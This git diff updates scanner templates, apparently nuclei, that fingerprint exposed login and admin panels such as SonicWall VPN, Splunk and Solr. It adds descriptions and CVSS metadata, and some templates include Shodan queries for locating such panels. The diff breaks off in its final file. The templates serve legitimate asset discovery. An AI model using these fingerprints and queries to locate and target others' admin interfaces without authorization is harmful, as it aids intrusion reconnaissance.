2023/01/09 diff --git a/exposed-panels/cacti-panel.yaml b/exposed-panels/cacti-panel.yaml index 63880c5c39..2b03bcc18c 100644 --- a/exposed-panels/cacti-panel.yaml +++ b/exposed-panels/cacti-panel.yaml @@ -1,10 +1,16 @@ id: cacti-panel info: - name: Cacti Login Panel + name: Cacti Login Panel - Detect author: geeknik,daffainfo severity: info - description: Cacti is a complete network graphing solution -- https://www.cacti.net/ + description: Cacti login panel was detected. + reference: + - https://www.cacti.net/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: tech,cacti,login requests: @@ -38,3 +44,5 @@ requests: group: 1 regex: - "
Version (.*) |" + +# Enhanced by md on 2023/01/09 diff --git a/exposed-panels/checkmk-login.yaml b/exposed-panels/checkmk-login.yaml index 6963e95af4..c7ff91878d 100644 --- a/exposed-panels/checkmk-login.yaml +++ b/exposed-panels/checkmk-login.yaml @@ -1,9 +1,14 @@ id: checkmk-login info: - name: Check MK Login Detect + name: Checkmk Login Panel - Detect author: princechaddha severity: info + description: Checkmk login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: login,tech,synology,rackstation requests: @@ -30,3 +35,5 @@ requests: regex: - '
([0-9.a-z]+)<\/div>' - '" condition: and + +# Enhanced by md on 2023/01/09 diff --git a/exposed-panels/seafile-panel.yaml b/exposed-panels/seafile-panel.yaml index d3e9dacc41..0560875ee9 100644 --- a/exposed-panels/seafile-panel.yaml +++ b/exposed-panels/seafile-panel.yaml @@ -1,14 +1,19 @@ id: seafile-panel info: - name: Seafile Panel + name: Seafile Panel - Detect author: TechbrunchFR severity: info + description: Seafile panel was detected. metadata: shodan-query: http.favicon.hash:1552322396 reference: - https://www.seafile.com/en/home/ - https://github.com/haiwen/seafile + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: sefile,panel requests: @@ -21,3 +26,5 @@ requests: - type: dsl dsl: - "status_code==200 && (\"1552322396\" == mmh3(base64_py(body)))" + +# Enhanced by md on 2023/01/09 diff --git a/exposed-panels/seats-login.yaml b/exposed-panels/seats-login.yaml index 59a2d82c77..6690aa43aa 100644 --- a/exposed-panels/seats-login.yaml +++ b/exposed-panels/seats-login.yaml @@ -1,9 +1,14 @@ id: seats-login info: - name: Seats login + name: Seats Login Panel - Detect author: dhiyaneshDK severity: info + description: Seats login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel requests: @@ -19,3 +24,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/09 diff --git a/exposed-panels/secmail-detect.yaml b/exposed-panels/secmail-detect.yaml index 2ef5f2eefa..15dc0af090 100644 --- a/exposed-panels/secmail-detect.yaml +++ b/exposed-panels/secmail-detect.yaml @@ -1,9 +1,14 @@ id: secmail-detect info: - name: SecMail - secure email Detect + name: SecMail Login Panel - Detect author: johnk3r severity: info + description: SecMail login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: secmail tags: secmail,panel @@ -23,3 +28,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/09 diff --git a/exposed-panels/secnet-ac-panel.yaml b/exposed-panels/secnet-ac-panel.yaml index a5cc2e02d5..95a6e0fbe3 100644 --- a/exposed-panels/secnet-ac-panel.yaml +++ b/exposed-panels/secnet-ac-panel.yaml @@ -1,9 +1,14 @@ id: secnet-ac-panel info: - name: Secnet ac Panel Detect + name: SecNet Login Panel - Detect author: ritikchaddha severity: info + description: SecNet login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: secnet-ac,panel requests: @@ -21,3 +26,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/09 diff --git a/exposed-panels/secure-login-panel.yaml b/exposed-panels/secure-login-panel.yaml index 382b8d1950..7f74d2cbdd 100644 --- a/exposed-panels/secure-login-panel.yaml +++ b/exposed-panels/secure-login-panel.yaml @@ -1,9 +1,14 @@ id: secure-login-panel info: - name: Secure Login Service Detector + name: Secure Login Service Login Panel - Detect author: dhiyaneshDK severity: info + description: Secure Login Service login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"Secure Login Service" tags: panel,sls,login,service @@ -22,3 +27,5 @@ requests: - type: word words: - "Secure Login Service" + +# Enhanced by md on 2023/01/09 diff --git a/exposed-panels/securenvoy-panel.yaml b/exposed-panels/securenvoy-panel.yaml index 138ed7d13c..8cae3b85d7 100644 --- a/exposed-panels/securenvoy-panel.yaml +++ b/exposed-panels/securenvoy-panel.yaml @@ -1,9 +1,14 @@ id: securenvoy-panel info: - name: SecurEnvoy Admin Login + name: SecurEnvoy Admin Login Panel - Detect author: 0xrod severity: info + description: SecurEnvoy admin login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,securenvoy requests: @@ -21,3 +26,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/09 diff --git a/exposed-panels/securepoint-utm.yaml b/exposed-panels/securepoint-utm.yaml index bca9fb0742..fe56239639 100644 --- a/exposed-panels/securepoint-utm.yaml +++ b/exposed-panels/securepoint-utm.yaml @@ -1,9 +1,14 @@ id: securepoint-utm info: - name: Securepoint UTM Admin Panel + name: Securepoint UTM Admin Panel - Detect author: pussycat0x severity: info + description: Securepoint UTM admin panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: fofa-dork: 'app="Securepoint-UTM-v11-Admin-Interface-11.8.8.8"' tags: securepoint,panel @@ -30,3 +35,5 @@ requests: group: 1 regex: - '\- Admin Interface \- ([0-9. (a-z)]+)<\/title>' + +# Enhanced by md on 2023/01/09 diff --git a/exposed-panels/securityspy-detect.yaml b/exposed-panels/securityspy-detect.yaml index 76a69cbbc1..0df90115f3 100644 --- a/exposed-panels/securityspy-detect.yaml +++ b/exposed-panels/securityspy-detect.yaml @@ -1,9 +1,14 @@ id: securityspy-detect info: - name: SecuritySpy Camera Detect + name: SecuritySpy Camera Panel - Detect author: pussycat0x severity: medium + description: SecuritySpy Camera panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-dork: 'title:SecuritySpy' tags: unauth,iot,securityspy,panel,camera @@ -23,3 +28,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/09 diff --git a/exposed-panels/sitecore-login-panel.yaml b/exposed-panels/sitecore-login-panel.yaml index 2c6afc303c..e311da19b0 100644 --- a/exposed-panels/sitecore-login-panel.yaml +++ b/exposed-panels/sitecore-login-panel.yaml @@ -1,9 +1,14 @@ id: sitecore-login-panel info: - name: Sitecore Login Panel + name: Sitecore Admin Login Panel - Detect author: b4uh0lz severity: info + description: Sitecore admin login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,sitecore,login requests: @@ -21,3 +26,5 @@ requests: words: - "Sitecore Login" part: body + +# Enhanced by md on 2023/01/15 diff --git a/exposed-panels/sitecore-login.yaml b/exposed-panels/sitecore-login.yaml index a84ba6d469..ee367e7882 100644 --- a/exposed-panels/sitecore-login.yaml +++ b/exposed-panels/sitecore-login.yaml @@ -1,9 +1,14 @@ id: sitecore-login info: - name: SiteCore Login + name: Sitecore Login Panel - Detect author: dhiyaneshDK severity: info + description: Sitecore login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"Welcome to Sitecore" tags: panel,sitecore @@ -22,3 +27,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/15 diff --git a/exposed-panels/siteomat-login.yaml b/exposed-panels/siteomat-login.yaml index d39849d735..da821e160e 100644 --- a/exposed-panels/siteomat-login.yaml +++ b/exposed-panels/siteomat-login.yaml @@ -1,11 +1,16 @@ id: siteomat-loader info: - name: Orpak SiteOmat login portals + name: Orpak SiteOmat Login Panel - Detect author: dhiyaneshDK severity: info + description: Orpak SiteOmat login panel was detected. reference: - https://www.exploit-db.com/ghdb/6624 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: siteomat,login,edb,panel requests: @@ -21,3 +26,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/15 diff --git a/exposed-panels/skycaiji-admin-panel.yaml b/exposed-panels/skycaiji-admin-panel.yaml index 302f6cef6f..30c5d0e619 100644 --- a/exposed-panels/skycaiji-admin-panel.yaml +++ b/exposed-panels/skycaiji-admin-panel.yaml @@ -1,9 +1,14 @@ id: skycaiji-admin-panel info: - name: SkyCaiji Admin Panel + name: SkyCaiji Admin Panel - Detect author: princechaddha severity: info + description: SkyCaiji admin panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,tech,skycaiji requests: @@ -31,3 +36,5 @@ requests: group: 1 regex: - 'com">SkyCaiji<\/a> ([A-Z0-9.]+) 后台管理<\/p>' + +# Enhanced by md on 2023/01/15 diff --git a/exposed-panels/slocum-login.yaml b/exposed-panels/slocum-login.yaml index 118932715d..ff6f250f40 100644 --- a/exposed-panels/slocum-login.yaml +++ b/exposed-panels/slocum-login.yaml @@ -1,9 +1,14 @@ id: slocum-login info: - name: Slocum Fleet Mission Control Login + name: Slocum Fleet Mission Control Login Panel - Detect author: pussycat0x severity: info + description: Slocum Fleet Mission Control login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,tech,slocum requests: @@ -20,3 +25,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/15 diff --git a/exposed-panels/smartping-dashboard.yaml b/exposed-panels/smartping-dashboard.yaml index 7d0be8873a..e7c6d109af 100644 --- a/exposed-panels/smartping-dashboard.yaml +++ b/exposed-panels/smartping-dashboard.yaml @@ -1,9 +1,14 @@ id: smartping-dashboard info: - name: Unauth SmartPing Dashboard + name: SmartPing Dashboard Panel - Detect author: DhiyaneshDk severity: low + description: SmartPing Dashboard panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: title:"SmartPing Dashboard" @@ -25,3 +30,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/15 diff --git a/exposed-panels/solarview-compact-panel.yaml b/exposed-panels/solarview-compact-panel.yaml index 800287fdd9..7c4ab50420 100644 --- a/exposed-panels/solarview-compact-panel.yaml +++ b/exposed-panels/solarview-compact-panel.yaml @@ -1,9 +1,14 @@ id: solarview-compact-panel info: - name: SolarView Compact Panel + name: SolarView Compact Panel - Detect author: princechaddha severity: info + description: SolarView Compact panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.html:"SolarView Compact" @@ -25,3 +30,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/15 diff --git a/exposed-panels/solarwinds-orion.yaml b/exposed-panels/solarwinds-orion.yaml index 9ab0d7bad7..a4639b3b89 100644 --- a/exposed-panels/solarwinds-orion.yaml +++ b/exposed-panels/solarwinds-orion.yaml @@ -1,9 +1,14 @@ id: solarwinds-orion info: - name: SolarWinds Orion Panel + name: SolarWinds Orion Login Panel - Detect author: puzzlepeaches severity: info + description: SolarWinds Orion login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,solarwinds requests: @@ -16,3 +21,5 @@ requests: words: - "SolarWinds Orion" part: body + +# Enhanced by md on 2023/01/15 diff --git a/exposed-panels/solarwinds-servuftp-detect.yaml b/exposed-panels/solarwinds-servuftp-detect.yaml index f443f549a0..6c86263b99 100644 --- a/exposed-panels/solarwinds-servuftp-detect.yaml +++ b/exposed-panels/solarwinds-servuftp-detect.yaml @@ -1,9 +1,14 @@ id: solarwinds-servuftp-detect info: - name: SolarWinds Serv-U FileServer + name: SolarWinds Serv-U File Server Panel - Detect author: johnk3r severity: info + description: SolarWinds Serv-U File Server panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: solarwinds,panel requests: @@ -27,3 +32,5 @@ requests: part: header kval: - Server + +# Enhanced by md on 2023/01/15 diff --git a/exposed-panels/solr-exposure.yaml b/exposed-panels/solr-exposure.yaml index 2cd195ed03..6dc6f0186e 100644 --- a/exposed-panels/solr-exposure.yaml +++ b/exposed-panels/solr-exposure.yaml @@ -1,9 +1,14 @@ id: solr-exposure info: - name: Apache Solr Exposure + name: Apache Solr Admin Panel - Detect author: pdteam severity: medium + description: Apache Solr admin panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cwe-id: CWE-200 metadata: shodan-query: http.title:"Solr Admin" tags: panel,solr,apache @@ -26,3 +31,5 @@ requests: group: 1 regex: - 'favicon\.ico\?_=([0-9.]+)' + +# Enhanced by md on 2023/01/15 diff --git a/exposed-panels/somansa-dlp-detect.yaml b/exposed-panels/somansa-dlp-detect.yaml index 0eea6d6df3..8bf37bb803 100644 --- a/exposed-panels/somansa-dlp-detect.yaml +++ b/exposed-panels/somansa-dlp-detect.yaml @@ -1,11 +1,16 @@ id: somansa-dlp-detect info: - name: Somansa DLP Center Detection + name: Somansa DLP Login Panel - Detect author: gy741,ritikchaddha severity: info + description: Somansa DLP login panel was detected. reference: - https://www.somansa.com/solution/integrated_solution/dlp/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.html:"DLP system" @@ -31,3 +36,5 @@ requests: - type: dsl dsl: - "status_code==200 && (\"-1217239281\" == mmh3(base64_py(body)))" + +# Enhanced by md on 2023/01/15 diff --git a/exposed-panels/somfy-login.yaml b/exposed-panels/somfy-login.yaml index 8103707ac5..17fb8762a3 100644 --- a/exposed-panels/somfy-login.yaml +++ b/exposed-panels/somfy-login.yaml @@ -1,9 +1,14 @@ id: somfy-login info: - name: Somfy Login Page + name: Somfy Login Panel - Detect author: DhiyaneshDK severity: info + description: Somfy login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,login requests: @@ -20,3 +25,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/15 diff --git a/exposed-panels/sonarqube-login.yaml b/exposed-panels/sonarqube-login.yaml index 1f9ab0f8cd..a0978f27ef 100644 --- a/exposed-panels/sonarqube-login.yaml +++ b/exposed-panels/sonarqube-login.yaml @@ -1,9 +1,14 @@ id: sonarqube-login info: - name: SonarQube panel detect + name: SonarQube Panel - Detect author: dhiyaneshDk severity: info + description: SonarQube panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,sonarqube requests: @@ -16,3 +21,5 @@ requests: words: - "SonarQube" part: body + +# Enhanced by md on 2023/01/15 diff --git a/exposed-panels/sonic-wall-application.yaml b/exposed-panels/sonic-wall-application.yaml index 15994b7820..e1c7fc3919 100644 --- a/exposed-panels/sonic-wall-application.yaml +++ b/exposed-panels/sonic-wall-application.yaml @@ -1,9 +1,14 @@ id: sonic-wall-application info: - name: Sonic Wall Appliance Management Console + name: SonicWall Appliance Management Console Login Panel - Detect author: DhiyaneshDk,Tess severity: info + description: SonicWall Appliance Management Console login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: title:"Appliance Management Console Login" @@ -23,3 +28,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/15 diff --git a/exposed-panels/sonicwall-analyzer-login.yaml b/exposed-panels/sonicwall-analyzer-login.yaml index 06e082922a..003055c0ac 100644 --- a/exposed-panels/sonicwall-analyzer-login.yaml +++ b/exposed-panels/sonicwall-analyzer-login.yaml @@ -1,9 +1,14 @@ id: sonicwall-analyzer-login info: - name: SonicWall Analyzer Login + name: SonicWall Analyzer Login Panel - Detect author: DhiyaneshDK severity: info + description: SonicWall Analyzer login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-dork: title:"SonicWall Analyzer Login" @@ -24,3 +29,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/15 diff --git a/exposed-panels/sonicwall-management-panel.yaml b/exposed-panels/sonicwall-management-panel.yaml index 4af9aae59d..bb085fa7b9 100644 --- a/exposed-panels/sonicwall-management-panel.yaml +++ b/exposed-panels/sonicwall-management-panel.yaml @@ -1,9 +1,14 @@ id: sonicwall-management-panel info: - name: SonicWall Management Panel + name: SonicWall Management Admin Login Panel - Detect author: PR3R00T severity: info + description: SonicWall Management admin login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,sonicwall requests: @@ -15,3 +20,5 @@ requests: words: - "SonicWall - Authentication" - "SonicWall Administrator" + +# Enhanced by md on 2023/01/15 diff --git a/exposed-panels/sonicwall-sslvpn-panel.yaml b/exposed-panels/sonicwall-sslvpn-panel.yaml index 4025c28287..6008f41a6c 100644 --- a/exposed-panels/sonicwall-sslvpn-panel.yaml +++ b/exposed-panels/sonicwall-sslvpn-panel.yaml @@ -1,9 +1,14 @@ id: sonicwall-sslvpn-panel info: - name: SonicWall Virtual Office SSLVPN Panel + name: SonicWall Virtual Office SSL VPN Login Panel - Detect author: PR3R00T severity: info + description: SonicWall Virtual Office SSL VPN login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,sonicwall requests: @@ -14,3 +19,5 @@ requests: - type: word words: - "Virtual Office" + +# Enhanced by md on 2023/01/15 diff --git a/exposed-panels/sophos-fw-version-detect.yaml b/exposed-panels/sophos-fw-version-detect.yaml index 3af32d9bce..639ff85f40 100644 --- a/exposed-panels/sophos-fw-version-detect.yaml +++ b/exposed-panels/sophos-fw-version-detect.yaml @@ -1,9 +1,14 @@ id: sophos-fw-version-detect info: - name: Sophos Firewall Version Detection + name: Sophos Firewall Login Panel - Detect author: organiccrap,daffainfo severity: info + description: Sophos Firewall login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: title:"Sophos" @@ -36,3 +41,5 @@ requests: group: 1 regex: - 'href="\/themes\/lite1\/css\/typography\.css\?version=(([0-9a-z]+)([0-9.]+))' + +# Enhanced by md on 2023/01/15 diff --git a/exposed-panels/sophos-mobile-panel.yaml b/exposed-panels/sophos-mobile-panel.yaml index d71015d42e..9a09e3aec2 100644 --- a/exposed-panels/sophos-mobile-panel.yaml +++ b/exposed-panels/sophos-mobile-panel.yaml @@ -1,12 +1,17 @@ id: sophos-mobile-panel info: - name: Sophos Mobile Panel Detect + name: Sophos Mobile Panel - Detect author: Adam Crosser,idealphase severity: info + description: Sophos Mobile panel was detected. reference: - https://www.sophos.com/en-us/products/mobile-control - https://www.sophos.com/en-us/support/downloads/sophos-mobile + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"Sophos Mobile" tags: panel,sophos @@ -27,3 +32,5 @@ requests: regex: - 'src="\/javax\.faces\.resource\/texteditor\/texteditor\.js\.xhtml\?ln=primefaces&v=(.+)"><\/script>' - 'src="\/javax\.faces\.resource\/components\.js\.xhtml\?ln=primefaces&v=(.+)"><\/script>' + +# Enhanced by md on 2023/01/15 diff --git a/exposed-panels/spark-panel.yaml b/exposed-panels/spark-panel.yaml index bc2ebeffc0..7e2dff6942 100644 --- a/exposed-panels/spark-panel.yaml +++ b/exposed-panels/spark-panel.yaml @@ -1,11 +1,16 @@ id: spark-panel info: - name: SPARK Panel Detect + name: Apache Spark Panel - Detect author: righettod severity: info + description: Apache Spark panel was detected. reference: - https://www.hypeinnovation.com + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: html:"/apps/IMT/Html/" @@ -26,3 +31,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/15 diff --git a/exposed-panels/sphider-login.yaml b/exposed-panels/sphider-login.yaml index 127ddc05af..f4daaf3599 100644 --- a/exposed-panels/sphider-login.yaml +++ b/exposed-panels/sphider-login.yaml @@ -1,11 +1,16 @@ id: sphider-login info: - name: Sphider Admin Login + name: Sphider Admin Login Panel - Detect author: dhiyaneshDK severity: info + description: Sphider admin login panel was detected. reference: - https://www.exploit-db.com/ghdb/6641 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: edb,panel requests: @@ -24,3 +29,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/14 diff --git a/exposed-panels/spiderfoot.yaml b/exposed-panels/spiderfoot.yaml index e07827d93b..f8a9c83ee6 100644 --- a/exposed-panels/spiderfoot.yaml +++ b/exposed-panels/spiderfoot.yaml @@ -1,11 +1,14 @@ id: spiderfoot info: - name: SpiderFoot Detection + name: SpiderFoot Login Panel - Detect author: geeknik severity: info - description: SpiderFoot is an OSINT automation tool. It integrates with just about every data source available and utilises a range of methods for data analysis, making that data easy to navigate. SpiderFoot has - an embedded web-server for providing a clean and intuitive web-based interface but can also be used completely via the command-line. + description: SpiderFoot login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,login,tech,spiderfoot requests: @@ -31,3 +34,5 @@ requests: part: body regex: - 'SpiderFoot v([0-9.]+)' + +# Enhanced by md on 2023/01/14 diff --git a/exposed-panels/splunk-enterprise-panel.yaml b/exposed-panels/splunk-enterprise-panel.yaml index c26f186a71..5b27cdbff4 100644 --- a/exposed-panels/splunk-enterprise-panel.yaml +++ b/exposed-panels/splunk-enterprise-panel.yaml @@ -1,11 +1,16 @@ id: splunk-enterprise-panel info: - name: Splunk Enterprise Panel Detect + name: Splunk Enterprise Login Panel - Detect author: praetorian-thendrickson severity: info + description: Splunk Enterprise login panel was detected. reference: - https://www.splunk.com/en_us/software/splunk-enterprise.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"Login - Splunk" tags: panel,splunk @@ -34,3 +39,5 @@ requests: - '"version": "(.*)"' - 'versionNumber": "([0-9.]+)"' - '"VERSION_LABEL": "([0-9.]+)"' + +# Enhanced by md on 2023/01/14 diff --git a/exposed-panels/splunk-login.yaml b/exposed-panels/splunk-login.yaml index ccfbcaee47..ed7c62f798 100644 --- a/exposed-panels/splunk-login.yaml +++ b/exposed-panels/splunk-login.yaml @@ -1,9 +1,14 @@ id: splunk-login info: - name: Splunk SOAR + name: Splunk SOAR Login Panel - Detect author: dhiyaneshDK severity: info + description: Splunk SOAR login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"Splunk SOAR" tags: panel,splunk @@ -22,3 +27,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/14 diff --git a/exposed-panels/squirrelmail-login.yaml b/exposed-panels/squirrelmail-login.yaml index 2cbbe656ed..9f854901c2 100644 --- a/exposed-panels/squirrelmail-login.yaml +++ b/exposed-panels/squirrelmail-login.yaml @@ -1,11 +1,16 @@ id: squirrelmail-login info: - name: SquirrelMail - Login + name: SquirrelMail Login Panel - Detect author: dhiyaneshDk,ritikchaddha severity: info + description: SquirrelMail login panel was detected. reference: - https://www.exploit-db.com/ghdb/7407 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: title:"SquirrelMail" tags: squirrelmail,edb,panel @@ -32,3 +37,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/14 diff --git a/exposed-panels/sqwebmail-login-panel.yaml b/exposed-panels/sqwebmail-login-panel.yaml index 1d96e132bc..76242ba844 100644 --- a/exposed-panels/sqwebmail-login-panel.yaml +++ b/exposed-panels/sqwebmail-login-panel.yaml @@ -1,9 +1,14 @@ id: sqwebmail-login-panel info: - name: SqWebMail Login Panel + name: SqWebMail Login Panel - Detect author: ritikchaddha severity: info + description: SqWebMail login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: title:"SqWebMail" @@ -24,3 +29,5 @@ requests: - type: word words: - "SqWebMail - Copyright" + +# Enhanced by md on 2023/01/14 diff --git a/exposed-panels/star-network-utility.yaml b/exposed-panels/star-network-utility.yaml index 71ea1c26f7..d728c8467e 100644 --- a/exposed-panels/star-network-utility.yaml +++ b/exposed-panels/star-network-utility.yaml @@ -1,9 +1,14 @@ id: star-network-utility info: - name: Star Network Utility Detect + name: Star Micronics Network Utility Panel - Detect author: ritikchaddha severity: info + description: Star Micronics Network Utility panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.html:"Network Utility" @@ -25,3 +30,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/14 diff --git a/exposed-panels/start-element-manager-panel.yaml b/exposed-panels/start-element-manager-panel.yaml index b70fe82816..684bf69472 100644 --- a/exposed-panels/start-element-manager-panel.yaml +++ b/exposed-panels/start-element-manager-panel.yaml @@ -1,9 +1,14 @@ id: start-element-manager-panel info: - name: Start Element Manager Panel Detect + name: Start Element Manager Panel - Detect author: princechaddha severity: info + description: Start Element Manager panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel requests: @@ -21,3 +26,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/14 diff --git a/exposed-panels/steve-login-panel.yaml b/exposed-panels/steve-login-panel.yaml index 5ba55d3f7e..942739af52 100644 --- a/exposed-panels/steve-login-panel.yaml +++ b/exposed-panels/steve-login-panel.yaml @@ -1,13 +1,17 @@ id: steve-login-panel info: - name: SteVe Login Panel + name: SteVe Login Panel - Detect author: clem9669 severity: info description: | - The aim of SteVe is to support the deployment and popularity of electric mobility. SteVe provides basic functions for the administration of charge points. + SteVe login panel was detected. reference: - https://github.com/steve-community/steve + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.title:"SteVe - Steckdosenverwaltung" @@ -33,3 +37,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/14 diff --git a/exposed-panels/strapi-documentation.yaml b/exposed-panels/strapi-documentation.yaml index d0637077ae..d85670d6e6 100644 --- 